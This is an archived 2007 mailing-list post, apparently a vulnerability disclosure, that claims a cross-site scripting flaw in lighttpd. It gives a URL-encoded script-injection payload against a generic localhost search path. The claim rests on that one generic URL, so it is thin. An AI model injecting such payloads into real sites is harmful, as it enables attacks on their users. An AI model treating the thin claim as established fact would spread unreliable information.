OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
XSS in lighttpd

bl4ckbsdmail.org
Date: Fri Feb 09 2007 - 15:34:01 CST


hey guys .. check out this new xss i just found ;P

Vulnerable : lighttpd
web : http://www.lighttpd.net

XSS :

http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E

Discovered By BLacK ZeRo
bL4ckbsdmail.org

Best regards ,,